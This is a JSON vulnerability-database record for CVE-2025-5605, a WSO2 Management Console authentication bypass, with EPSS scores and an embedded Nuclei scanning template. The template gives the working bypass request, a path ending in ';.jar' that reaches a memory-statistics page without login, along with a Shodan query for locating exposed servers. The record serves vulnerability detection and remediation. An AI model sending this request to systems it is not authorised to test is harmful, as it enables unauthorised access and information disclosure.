{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2025-5605/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2025-5605/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2025-5605/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2025-5605/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2025-5605/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2025-5605"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2025-5605"
    }
  },
  "enrichments": {
    "cisa-kev": {
      "kev": false
    },
    "epss": {
      "epss": 0.0085,
      "kev": false,
      "percentile": 0.56323
    },
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2025/CVE-2025-5605.yaml",
      "nuclei_template_severity": "medium",
      "nuclei_template_yaml": "id: CVE-2025-5605\n\ninfo:\n  name: WSO2 Management Console - Authentication Bypass\n  author: DhiyaneshDK\n  severity: medium\n  description: |\n    An authentication bypass vulnerability exists in the Management Console of multiple WSO2 products. A malicious actor with access to the console can manipulate the request URI to bypass authentication and access certain restricted resources, resulting in partial information disclosure. The known exposure from this issue is limited to memory statistics. While the vulnerability does not allow full account compromise, it still enables unauthorized access to internal system details.\n  remediation: |\n    Apply security patches as per WSO2-2025-4115 advisory to enforce proper authentication on Management Console endpoints.\n  impact: |\n    Attackers can bypass authentication to access internal memory statistics, leading to partial information disclosure.\n  reference:\n    - https://blog.lexfo.fr/wso2.html\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-5605\n    - https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2025/WSO2-2025-4115/\n  metadata:\n    verified: true\n    max-request: 1\n    shodan-query: http.favicon.hash:1398055326\n  tags: cve,cve2025,wso2,auth-bypass,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        GET /carbon/server-admin/memory_info.jsp;.jar HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        words:\n          - 'Memory Statistics'\n          - 'Collection Usage'\n        condition: and\n\n      - type: status\n        status:\n          - 200\n# digest: 490a0046304402207dc68a15c2b785260e3ef1f8803cbdcad10fe200787832c034ada9e1158f602d022008d49961011e276baf6081202ea168e8668950ae733a28f4d2514a44033b678d:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2025-5605"
}